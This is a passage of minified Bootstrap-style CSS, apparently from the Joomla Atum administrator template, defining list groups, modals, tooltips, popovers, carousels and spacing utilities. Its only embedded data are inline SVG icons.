";counter-increment:section}.list-group-item-action{width:100%;color:#495057;text-align:inherit}.list-group-item-action:focus,.list-group-item-action:hover{z-index:1;color:#495057;text-decoration:none;background-color:#f8f9fa}.list-group-item-action:active{color:var(--template-text-dark);background-color:#e8e8e8}.list-group-item{position:relative;display:block;padding:.75rem 1rem;color:#212529;border:1px solid hsl(var(--hue),40%,85%)}.list-group-item:first-child{border-top-left-radius:inherit;border-top-right-radius:inherit}.list-group-item:last-child{border-bottom-right-radius:inherit;border-bottom-left-radius:inherit}.list-group-item.disabled,.list-group-item:disabled{color:#666e76;pointer-events:none;background-color:var(--white-offset)}.list-group-item.active{z-index:2;color:#fff;background-color:#2a69b7;border-color:#2a69b7}.list-group-item+.list-group-item{border-top-width:0}.list-group-item+.list-group-item.active{margin-top:-1px;border-top-width:1px}.list-group-horizontal{flex-direction:row}.list-group-horizontal>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal>.list-group-item.active{margin-top:0}.list-group-horizontal>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}@media (min-width:576px){.list-group-horizontal-sm{flex-direction:row}.list-group-horizontal-sm>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-sm>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-sm>.list-group-item.active{margin-top:0}.list-group-horizontal-sm>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-sm>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:768px){.list-group-horizontal-md{flex-direction:row}.list-group-horizontal-md>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-md>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-md>.list-group-item.active{margin-top:0}.list-group-horizontal-md>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-md>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:992px){.list-group-horizontal-lg{flex-direction:row}.list-group-horizontal-lg>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-lg>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-lg>.list-group-item.active{margin-top:0}.list-group-horizontal-lg>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-lg>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:1200px){.list-group-horizontal-xl{flex-direction:row}.list-group-horizontal-xl>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-xl>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-xl>.list-group-item.active{margin-top:0}.list-group-horizontal-xl>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-xl>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}@media (min-width:1400px){.list-group-horizontal-xxl{flex-direction:row}.list-group-horizontal-xxl>.list-group-item:first-child{border-bottom-left-radius:.25rem;border-top-right-radius:0}.list-group-horizontal-xxl>.list-group-item:last-child{border-top-right-radius:.25rem;border-bottom-left-radius:0}.list-group-horizontal-xxl>.list-group-item.active{margin-top:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-xxl>.list-group-item+.list-group-item.active{margin-left:-1px;border-left-width:1px}}.list-group-flush{border-radius:0}.list-group-flush>.list-group-item{border-width:0 0 1px}.list-group-flush>.list-group-item:last-child{border-bottom-width:0}.list-group-item-primary{color:#0b1c32;background-color:#d0d5dd}.list-group-item-primary.list-group-item-action:focus,.list-group-item-primary.list-group-item-action:hover{color:#0b1c32;background-color:#bbc0c7}.list-group-item-primary.list-group-item-action.active{color:#fff;background-color:#0b1c32;border-color:#0b1c32}.list-group-item-secondary{color:#2c3034;background-color:#dbdcdd}.list-group-item-secondary.list-group-item-action:focus,.list-group-item-secondary.list-group-item-action:hover{color:#2c3034;background-color:#c5c6c7}.list-group-item-secondary.list-group-item-action.active{color:#fff;background-color:#2c3034;border-color:#2c3034}.list-group-item-success{color:#294b32;background-color:#dae5dd}.list-group-item-success.list-group-item-action:focus,.list-group-item-success.list-group-item-action:hover{color:#294b32;background-color:#c4cec7}.list-group-item-success.list-group-item-action.active{color:#fff;background-color:#294b32;border-color:#294b32}.list-group-item-info{color:#193f6e;background-color:#d4e1f1}.list-group-item-info.list-group-item-action:focus,.list-group-item-info.list-group-item-action:hover{color:#193f6e;background-color:#bfcbd9}.list-group-item-info.list-group-item-action.active{color:#fff;background-color:#193f6e;border-color:#193f6e}.list-group-item-warning{color:#664808;background-color:#fff0d0}.list-group-item-warning.list-group-item-action:focus,.list-group-item-warning.list-group-item-action:hover{color:#664808;background-color:#e6d8bb}.list-group-item-warning.list-group-item-action.active{color:#fff;background-color:#664808;border-color:#664808}.list-group-item-danger{color:#761817;background-color:#f3d4d4}.list-group-item-danger.list-group-item-action:focus,.list-group-item-danger.list-group-item-action:hover{color:#761817;background-color:#dbbfbf}.list-group-item-danger.list-group-item-action.active{color:#fff;background-color:#761817;border-color:#761817}.list-group-item-light{color:#636464;background-color:#fefefe}.list-group-item-light.list-group-item-action:focus,.list-group-item-light.list-group-item-action:hover{color:#636464;background-color:#e5e5e5}.list-group-item-light.list-group-item-action.active{color:#fff;background-color:#636464;border-color:#636464}.list-group-item-dark{color:#141619;background-color:#d3d3d4}.list-group-item-dark.list-group-item-action:focus,.list-group-item-dark.list-group-item-action:hover{color:#141619;background-color:#bebebf}.list-group-item-dark.list-group-item-action.active{color:#fff;background-color:#141619;border-color:#141619}.list-group-item-atum-link-color{color:#193f6e;background-color:#d4e1f1}.list-group-item-atum-link-color.list-group-item-action:focus,.list-group-item-atum-link-color.list-group-item-action:hover{color:#193f6e;background-color:#bfcbd9}.list-group-item-atum-link-color.list-group-item-action.active{color:#fff;background-color:#193f6e;border-color:#193f6e}.list-group-item-atum-text-dark{color:#2c3034;background-color:#dbdcdd}.list-group-item-atum-text-dark.list-group-item-action:focus,.list-group-item-atum-text-dark.list-group-item-action:hover{color:#2c3034;background-color:#c5c6c7}.list-group-item-atum-text-dark.list-group-item-action.active{color:#fff;background-color:#2c3034;border-color:#2c3034}.list-group-item-action{color:#0b1c32;background-color:#d0d5dd}.list-group-item-action.list-group-item-action:focus,.list-group-item-action.list-group-item-action:hover{color:#0b1c32;background-color:#bbc0c7}.list-group-item-action.list-group-item-action.active{color:#fff;background-color:#0b1c32;border-color:#0b1c32}.list-group-item-error{color:#230807;background-color:#d8cfce}.list-group-item-error.list-group-item-action:focus,.list-group-item-error.list-group-item-action:hover{color:#230807;background-color:#c2bab9}.list-group-item-error.list-group-item-action.active{color:#fff;background-color:#230807;border-color:#230807}.list-group-item-alert-success{color:#091c14;background-color:#cfd5d3}.list-group-item-alert-success.list-group-item-action:focus,.list-group-item-alert-success.list-group-item-action:hover{color:#091c14;background-color:#bac0be}.list-group-item-alert-success.list-group-item-action.active{color:#fff;background-color:#091c14;border-color:#091c14}.btn-close{box-sizing:content-box;width:1em;height:1em;padding:.25em;color:#000;background:transparent url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16'%3E%3Cpath d='M.293.293a1 1 0 011.414 0L8 6.586 14.293.293a1 1 0 111.414 1.414L9.414 8l6.293 6.293a1 1 0 01-1.414 1.414L8 9.414l-6.293 6.293a1 1 0 01-1.414-1.414L6.586 8 .293 1.707a1 1 0 010-1.414z'/%3E%3C/svg%3E") 50%/1em auto no-repeat;border:0;border-radius:.25rem;opacity:.5}.btn-close:hover{color:#000;text-decoration:none;opacity:.75}.btn-close:focus{outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25);opacity:1}.btn-close.disabled,.btn-close:disabled{pointer-events:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;opacity:.25}.btn-close-white{-webkit-filter:invert(1) grayscale(100%) brightness(200%);filter:invert(1) grayscale(100%) brightness(200%)}.modal{position:fixed;top:0;left:0;z-index:1050;display:none;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;outline:0}.modal-dialog{position:relative;width:auto;margin:.5rem;pointer-events:none}.modal.fade .modal-dialog{transition:-webkit-transform .3s ease-out;transition:transform .3s ease-out;transition:transform .3s ease-out,-webkit-transform .3s ease-out;-webkit-transform:translateY(-50px);transform:translateY(-50px)}@media (prefers-reduced-motion:reduce){.modal.fade .modal-dialog{transition:none}}.modal.show .modal-dialog{-webkit-transform:none;transform:none}.modal.modal-static .modal-dialog{-webkit-transform:scale(1.02);transform:scale(1.02)}.modal-dialog-scrollable{height:calc(100% - 1rem)}.modal-dialog-scrollable .modal-content{max-height:100%;overflow:hidden}.modal-dialog-scrollable .modal-body{overflow-y:auto}.modal-dialog-centered{display:flex;align-items:center;min-height:calc(100% - 1rem)}.modal-content{position:relative;display:flex;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem;outline:0}.modal-backdrop{position:fixed;top:0;left:0;z-index:1040;width:100vw;height:100vh;background-color:#000}.modal-backdrop.fade{opacity:0}.modal-backdrop.show{opacity:.5}.modal-header{display:flex;flex-shrink:0;align-items:center;justify-content:space-between;padding:1rem;border-bottom:1px solid #dee2e6;border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.modal-header .btn-close{padding:.5rem;margin:-.5rem -.5rem -.5rem auto}.modal-title{margin-bottom:0;line-height:1.5}.modal-body{position:relative;flex:1 1 auto;padding:1rem}.modal-footer{display:flex;flex-wrap:wrap;flex-shrink:0;align-items:center;justify-content:flex-end;padding:.75rem;border-top:1px solid #dee2e6;border-bottom-right-radius:calc(.3rem - 1px);border-bottom-left-radius:calc(.3rem - 1px)}.modal-footer>*{margin:.25rem}@media (min-width:576px){.modal-dialog{max-width:500px;margin:1.75rem auto}.modal-dialog-scrollable{height:calc(100% - 3.5rem)}.modal-dialog-centered{min-height:calc(100% - 3.5rem)}.modal-sm{max-width:300px}}@media (min-width:992px){.modal-lg,.modal-xl{max-width:800px}}@media (min-width:1200px){.modal-xl{max-width:1140px}}.modal-fullscreen{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen .modal-header{border-radius:0}.modal-fullscreen .modal-body{overflow-y:auto}.modal-fullscreen .modal-footer{border-radius:0}@media (max-width:575.98px){.modal-fullscreen-sm-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-sm-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-sm-down .modal-header{border-radius:0}.modal-fullscreen-sm-down .modal-body{overflow-y:auto}.modal-fullscreen-sm-down .modal-footer{border-radius:0}}@media (max-width:767.98px){.modal-fullscreen-md-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-md-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-md-down .modal-header{border-radius:0}.modal-fullscreen-md-down .modal-body{overflow-y:auto}.modal-fullscreen-md-down .modal-footer{border-radius:0}}@media (max-width:991.98px){.modal-fullscreen-lg-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-lg-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-lg-down .modal-header{border-radius:0}.modal-fullscreen-lg-down .modal-body{overflow-y:auto}.modal-fullscreen-lg-down .modal-footer{border-radius:0}}@media (max-width:1199.98px){.modal-fullscreen-xl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xl-down .modal-header{border-radius:0}.modal-fullscreen-xl-down .modal-body{overflow-y:auto}.modal-fullscreen-xl-down .modal-footer{border-radius:0}}@media (max-width:1399.98px){.modal-fullscreen-xxl-down{width:100vw;max-width:none;height:100%;margin:0}.modal-fullscreen-xxl-down .modal-content{height:100%;border:0;border-radius:0}.modal-fullscreen-xxl-down .modal-header{border-radius:0}.modal-fullscreen-xxl-down .modal-body{overflow-y:auto}.modal-fullscreen-xxl-down .modal-footer{border-radius:0}}.tooltip{position:absolute;z-index:1070;display:block;margin:0;font-family:var(--font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.8rem;word-wrap:break-word;opacity:0}.tooltip.show{opacity:.9}.tooltip .tooltip-arrow{position:absolute;display:block;width:.8rem;height:.4rem}.tooltip .tooltip-arrow:before{position:absolute;content:"";border-color:transparent;border-style:solid}.bs-tooltip-auto[data-popper-placement^=top],.bs-tooltip-top{padding:.4rem 0}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow,.bs-tooltip-top .tooltip-arrow{bottom:0}.bs-tooltip-auto[data-popper-placement^=top] .tooltip-arrow:before,.bs-tooltip-top .tooltip-arrow:before{top:-1px;border-width:.4rem .4rem 0;border-top-color:#000}.bs-tooltip-auto[data-popper-placement^=right],.bs-tooltip-end{padding:0 .4rem}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow,.bs-tooltip-end .tooltip-arrow{left:0;width:.4rem;height:.8rem}.bs-tooltip-auto[data-popper-placement^=right] .tooltip-arrow:before,.bs-tooltip-end .tooltip-arrow:before{right:-1px;border-width:.4rem .4rem .4rem 0;border-right-color:#000}.bs-tooltip-auto[data-popper-placement^=bottom],.bs-tooltip-bottom{padding:.4rem 0}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow,.bs-tooltip-bottom .tooltip-arrow{top:0}.bs-tooltip-auto[data-popper-placement^=bottom] .tooltip-arrow:before,.bs-tooltip-bottom .tooltip-arrow:before{bottom:-1px;border-width:0 .4rem .4rem;border-bottom-color:#000}.bs-tooltip-auto[data-popper-placement^=left],.bs-tooltip-start{padding:0 .4rem}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow,.bs-tooltip-start .tooltip-arrow{right:0;width:.4rem;height:.8rem}.bs-tooltip-auto[data-popper-placement^=left] .tooltip-arrow:before,.bs-tooltip-start .tooltip-arrow:before{left:-1px;border-width:.4rem 0 .4rem .4rem;border-left-color:#000}.tooltip-inner{max-width:200px;padding:.25rem .5rem;color:#fff;text-align:center;background-color:#000;border-radius:.25rem}.popover{position:absolute;top:0;left:0;z-index:1060;display:block;max-width:276px;font-family:var(--font-sans-serif);font-style:normal;font-weight:400;line-height:1.5;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.8rem;word-wrap:break-word;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem}.popover .popover-arrow{position:absolute;display:block;width:1rem;height:.5rem}.popover .popover-arrow:after,.popover .popover-arrow:before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow,.bs-popover-top>.popover-arrow{bottom:calc(-.5rem - 1px)}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow:before,.bs-popover-top>.popover-arrow:before{bottom:0;border-width:.5rem .5rem 0;border-top-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=top]>.popover-arrow:after,.bs-popover-top>.popover-arrow:after{bottom:1px;border-width:.5rem .5rem 0;border-top-color:#fff}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow,.bs-popover-end>.popover-arrow{left:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow:before,.bs-popover-end>.popover-arrow:before{left:0;border-width:.5rem .5rem .5rem 0;border-right-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=right]>.popover-arrow:after,.bs-popover-end>.popover-arrow:after{left:1px;border-width:.5rem .5rem .5rem 0;border-right-color:#fff}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow,.bs-popover-bottom>.popover-arrow{top:calc(-.5rem - 1px)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow:before,.bs-popover-bottom>.popover-arrow:before{top:0;border-width:0 .5rem .5rem;border-bottom-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=bottom]>.popover-arrow:after,.bs-popover-bottom>.popover-arrow:after{top:1px;border-width:0 .5rem .5rem;border-bottom-color:#fff}.bs-popover-auto[data-popper-placement^=bottom] .popover-header:before,.bs-popover-bottom .popover-header:before{position:absolute;top:0;left:50%;display:block;width:1rem;margin-left:-.5rem;content:"";border-bottom:1px solid #f0f0f0}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow,.bs-popover-start>.popover-arrow{right:calc(-.5rem - 1px);width:.5rem;height:1rem}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow:before,.bs-popover-start>.popover-arrow:before{right:0;border-width:.5rem 0 .5rem .5rem;border-left-color:rgba(0,0,0,.25)}.bs-popover-auto[data-popper-placement^=left]>.popover-arrow:after,.bs-popover-start>.popover-arrow:after{right:1px;border-width:.5rem 0 .5rem .5rem;border-left-color:#fff}.popover-header{padding:.5rem 1rem;margin-bottom:0;font-size:1rem;color:var(--template-bg-dark);background-color:#f0f0f0;border-bottom:1px solid rgba(0,0,0,.2);border-top-left-radius:calc(.3rem - 1px);border-top-right-radius:calc(.3rem - 1px)}.popover-header:empty{display:none}.popover-body{padding:1rem;color:var(--template-text-dark)}.carousel{position:relative}.carousel.pointer-event{touch-action:pan-y}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner:after{display:block;clear:both;content:""}.carousel-item{position:relative;display:none;float:left;width:100%;margin-right:-100%;-webkit-backface-visibility:hidden;backface-visibility:hidden;transition:-webkit-transform .6s ease-in-out;transition:transform .6s ease-in-out;transition:transform .6s ease-in-out,-webkit-transform .6s ease-in-out}@media (prefers-reduced-motion:reduce){.carousel-item{transition:none}}.carousel-item-next,.carousel-item-prev,.carousel-item.active{display:block}.active.carousel-item-end,.carousel-item-next:not(.carousel-item-start){-webkit-transform:translateX(100%);transform:translateX(100%)}.active.carousel-item-start,.carousel-item-prev:not(.carousel-item-end){-webkit-transform:translateX(-100%);transform:translateX(-100%)}.carousel-fade .carousel-item{opacity:0;transition-property:opacity;-webkit-transform:none;transform:none}.carousel-fade .carousel-item-next.carousel-item-start,.carousel-fade .carousel-item-prev.carousel-item-end,.carousel-fade .carousel-item.active{z-index:1;opacity:1}.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{z-index:0;opacity:0;transition:opacity 0s .6s}@media (prefers-reduced-motion:reduce){.carousel-fade .active.carousel-item-end,.carousel-fade .active.carousel-item-start{transition:none}}.carousel-control-next,.carousel-control-prev{position:absolute;top:0;bottom:0;z-index:1;display:flex;align-items:center;justify-content:center;width:15%;padding:0;color:#fff;text-align:center;background:none;border:0;opacity:.5;transition:opacity .15s ease}@media (prefers-reduced-motion:reduce){.carousel-control-next,.carousel-control-prev{transition:none}}.carousel-control-next:focus,.carousel-control-next:hover,.carousel-control-prev:focus,.carousel-control-prev:hover{color:#fff;text-decoration:none;outline:0;opacity:.9}.carousel-control-prev{left:0}.carousel-control-next{right:0}.carousel-control-next-icon,.carousel-control-prev-icon{display:inline-block;width:2rem;height:2rem;background-repeat:no-repeat;background-position:50%;background-size:100% 100%}.carousel-control-prev-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3E%3Cpath d='M11.354 1.646a.5.5 0 010 .708L5.707 8l5.647 5.646a.5.5 0 01-.708.708l-6-6a.5.5 0 010-.708l6-6a.5.5 0 01.708 0z'/%3E%3C/svg%3E")}.carousel-control-next-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23fff'%3E%3Cpath d='M4.646 1.646a.5.5 0 01.708 0l6 6a.5.5 0 010 .708l-6 6a.5.5 0 01-.708-.708L10.293 8 4.646 2.354a.5.5 0 010-.708z'/%3E%3C/svg%3E")}.carousel-indicators{position:absolute;right:0;bottom:0;left:0;z-index:2;display:flex;justify-content:center;padding:0;margin-right:15%;margin-bottom:1rem;margin-left:15%;list-style:none}.carousel-indicators [data-bs-target]{box-sizing:content-box;flex:0 1 auto;width:30px;height:3px;padding:0;margin-right:3px;margin-left:3px;text-indent:-999px;cursor:pointer;background-color:#fff;background-clip:padding-box;border:0;border-top:10px solid transparent;border-bottom:10px solid transparent;opacity:.5;transition:opacity .6s ease}@media (prefers-reduced-motion:reduce){.carousel-indicators [data-bs-target]{transition:none}}.carousel-indicators .active{opacity:1}.carousel-caption{position:absolute;right:15%;bottom:1.25rem;left:15%;padding-top:1.25rem;padding-bottom:1.25rem;color:#fff;text-align:center}.carousel-dark .carousel-control-next-icon,.carousel-dark .carousel-control-prev-icon{-webkit-filter:invert(1) grayscale(100);filter:invert(1) grayscale(100)}.carousel-dark .carousel-indicators [data-bs-target]{background-color:#000}.carousel-dark .carousel-caption{color:#000}.align-baseline{vertical-align:baseline!important}.align-top{vertical-align:top!important}.align-middle{vertical-align:middle!important}.align-bottom{vertical-align:bottom!important}.align-text-bottom{vertical-align:text-bottom!important}.align-text-top{vertical-align:text-top!important}.float-start{float:left!important}.float-end{float:right!important}.float-none{float:none!important}.overflow-auto{overflow:auto!important}.overflow-hidden{overflow:hidden!important}.overflow-visible{overflow:visible!important}.overflow-scroll{overflow:scroll!important}.d-inline{display:inline!important}.d-inline-block{display:inline-block!important}.d-block{display:block!important}.d-grid{display:grid!important}.d-table{display:table!important}.d-table-row{display:table-row!important}.d-table-cell{display:table-cell!important}.d-flex{display:flex!important}.d-inline-flex{display:inline-flex!important}.d-none{display:none!important}.shadow{box-shadow:0 .5rem 1rem rgba(0,0,0,.15)!important}.shadow-sm{box-shadow:0 .125rem .25rem rgba(0,0,0,.075)!important}.shadow-lg{box-shadow:0 1rem 3rem rgba(0,0,0,.175)!important}.shadow-none{box-shadow:none!important}.position-static{position:static!important}.position-relative{position:relative!important}.position-absolute{position:absolute!important}.position-fixed{position:fixed!important}.position-sticky{position:sticky!important}.top-0{top:0!important}.top-50{top:50%!important}.top-100{top:100%!important}.bottom-0{bottom:0!important}.bottom-50{bottom:50%!important}.bottom-100{bottom:100%!important}.start-0{left:0!important}.start-50{left:50%!important}.start-100{left:100%!important}.end-0{right:0!important}.end-50{right:50%!important}.end-100{right:100%!important}.translate-middle{-webkit-transform:translate(-50%,-50%)!important;transform:translate(-50%,-50%)!important}.translate-middle-x{-webkit-transform:translateX(-50%)!important;transform:translateX(-50%)!important}.translate-middle-y{-webkit-transform:translateY(-50%)!important;transform:translateY(-50%)!important}.border{border:1px solid #dee2e6!important}.border-0{border:0!important}.border-top{border-top:1px solid #dee2e6!important}.border-top-0{border-top:0!important}.border-end{border-right:1px solid #dee2e6!important}.border-end-0{border-right:0!important}.border-bottom{border-bottom:1px solid #dee2e6!important}.border-bottom-0{border-bottom:0!important}.border-start{border-left:1px solid #dee2e6!important}.border-start-0{border-left:0!important}.border-primary{border-color:#132f53!important}.border-secondary{border-color:#495057!important}.border-success{border-color:#457d54!important}.border-info{border-color:#2a69b8!important}.border-warning{border-color:#ffb514!important}.border-danger{border-color:#c52827!important}.border-light{border-color:#f8f9fa!important}.border-dark{border-color:#212529!important}.border-atum-link-color{border-color:#2a69b8!important}.border-atum-text-dark{border-color:#495057!important}.border-action{border-color:#132f53!important}.border-error{border-color:#3b0d0c!important}.border-alert-success{border-color:#0f2f21!important}.border-white{border-color:#fff!important}.border-1{border-width:1px!important}.border-2{border-width:2px!important}.border-3{border-width:3px!important}.border-4{border-width:4px!important}.border-5{border-width:5px!important}.w-25{width:25%!important}.w-50{width:50%!important}.w-75{width:75%!important}.w-100{width:100%!important}.w-auto{width:auto!important}.mw-100{max-width:100%!important}.vw-100{width:100vw!important}.min-vw-100{min-width:100vw!important}.h-25{height:25%!important}.h-50{height:50%!important}.h-75{height:75%!important}.h-100{height:100%!important}.h-auto{height:auto!important}.mh-100{max-height:100%!important}.vh-100{height:100vh!important}.min-vh-100{min-height:100vh!important}.flex-fill{flex:1 1 auto!important}.flex-row{flex-direction:row!important}.flex-column{flex-direction:column!important}.flex-row-reverse{flex-direction:row-reverse!important}.flex-column-reverse{flex-direction:column-reverse!important}.flex-grow-0{flex-grow:0!important}.flex-grow-1{flex-grow:1!important}.flex-shrink-0{flex-shrink:0!important}.flex-shrink-1{flex-shrink:1!important}.flex-wrap{flex-wrap:wrap!important}.flex-nowrap{flex-wrap:nowrap!important}.flex-wrap-reverse{flex-wrap:wrap-reverse!important}.gap-0{gap:0!important}.gap-1{gap:.25rem!important}.gap-2{gap:.5rem!important}.gap-3{gap:1rem!important}.gap-4{gap:1.5rem!important}.gap-5{gap:3rem!important}.justify-content-start{justify-content:flex-start!important}.justify-content-end{justify-content:flex-end!important}.justify-content-center{justify-content:center!important}.justify-content-between{justify-content:space-between!important}.justify-content-around{justify-content:space-around!important}.justify-content-evenly{justify-content:space-evenly!important}.align-items-start{align-items:flex-start!important}.align-items-end{align-items:flex-end!important}.align-items-center{align-items:center!important}.align-items-baseline{align-items:baseline!important}.align-items-stretch{align-items:stretch!important}.align-content-start{align-content:flex-start!important}.align-content-end{align-content:flex-end!important}.align-content-center{align-content:center!important}.align-content-between{align-content:space-between!important}.align-content-around{align-content:space-around!important}.align-content-stretch{align-content:stretch!important}.align-self-auto{align-self:auto!important}.align-self-start{align-self:flex-start!important}.align-self-end{align-self:flex-end!important}.align-self-center{align-self:center!important}.align-self-baseline{align-self:baseline!important}.align-self-stretch{align-self:stretch!important}.order-first{order:-1!important}.order-0{order:0!important}.order-1{order:1!important}.order-2{order:2!important}.order-3{order:3!important}.order-4{order:4!important}.order-5{order:5!important}.order-last{order:6!important}.m-0{margin:0!important}.m-1{margin:.25rem!important}.m-2{margin:.5rem!important}.m-3{margin:1rem!important}.m-4{margin:1.5rem!important}.m-5{margin:3rem!important}.m-auto{margin:auto!important}.mx-0{margin-right:0!important;margin-left:0!important}.mx-1{margin-right:.25rem!important;margin-left:.25rem!important}.mx-2{margin-right:.5rem!important;margin-left:.5rem!important}.mx-3{margin-right:1rem!important;margin-left:1rem!important}.mx-4{margin-right:1.5rem!important;margin-left:1.5rem!important}.mx-5{margin-right:3rem!important;margin-left:3rem!important}.mx-auto{margin-right:auto!important;margin-left:auto!important}.my-0{margin-top:0!important;margin-bottom:0!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.my-3{margin-top:1rem!important;margin-bottom:1rem!important}.my-4{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.my-5{margin-top:3rem!important;margin-bottom:3rem!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.mt-0{margin-top:0!important}.mt-1{margin-top:.25rem!important}.mt-2{margin-top:.5rem!important}.mt-3{margin-top:1rem!important}.mt-4{margin-top:1.5rem!important}.mt-5{margin-top:3rem!important}.mt-auto{margin-top:auto!important}.me-0{margin-right:0!important}.me-1{margin-right:.25rem!important}.me-2{margin-right:.5rem!important}.me-3{margin-right:1rem!important}.me-4{margin-right:1.5rem!important}.me-5{margin-right:3rem!important}.me-auto{margin-right:auto!important}.mb-0{margin-bottom:0!important}.mb-1{margin-bottom:.25rem!important}.mb-2{margin-bottom:.5rem!important}.form-group,.mb-3{margin-bottom:1rem!important}.mb-4{margin-bottom:1.5rem!important}.mb-5{margin-bottom:3rem!important}.mb-auto{margin-bottom:auto!important}.ms-0{margin-left:0!important}.ms-1{margin-left:.25rem!important}.ms-2{margin-left:.5rem!important}.ms-3{margin-left:1rem!important}.ms-4{margin-left:1.5rem!important}.ms-5{margin-left:3rem!important}.ms-auto{margin-left:auto!important}.p-0{padding:0!important}.p-1{padding:.25rem!important}.p-2{padding:.5rem!important}.p-3{padding:1rem!important}.p-4{padding:1.5rem!important}.p-5{padding:3rem!important}.px-0{padding-right:0!important;padding-left:0!important}.px-1{padding-right:.25rem!important;padding-left:.25rem!important}.px-2{padding-right:.5rem!important;padding-left:.5rem!important}.px-3{padding-right:1rem!important;padding-left:1rem!important}.px-4{padding-right:1.5rem!important;padding-left:1.5rem!important}.px-5{padding-right:3rem!important;padding-left:3rem!important}.py-0{padding-top:0!important;padding-bottom:0!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.py-3{padding-top:1rem!important;padding-bottom:1rem!important}.py-4{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.py-5{padding-top:3rem!important;padding-bottom:3rem!important}.pt-0{padding-top:0!important}.pt-1{padding-top:.25rem!important}.pt-2{padding-top:.5rem!important}.pt-3{padding-top:1rem!important}.pt-4{padding-top:1.5rem!important}.pt-5{padding-top:3rem!important}.pe-1{padding-right:.25rem!important}.pe-2{padding-right:.5rem!important}.pe-3{padding-right:1rem!important}.pe-4{padding-right:1.5rem!important}.pe-5{padding-right:3rem!important}.pb-0{padding-bottom:0!important}.pb-1{padding-bottom:.25rem!important}.pb-2{padding-bottom:.5rem!important}.pb-3{padding-bottom:1rem!important}.pb-4{padding-b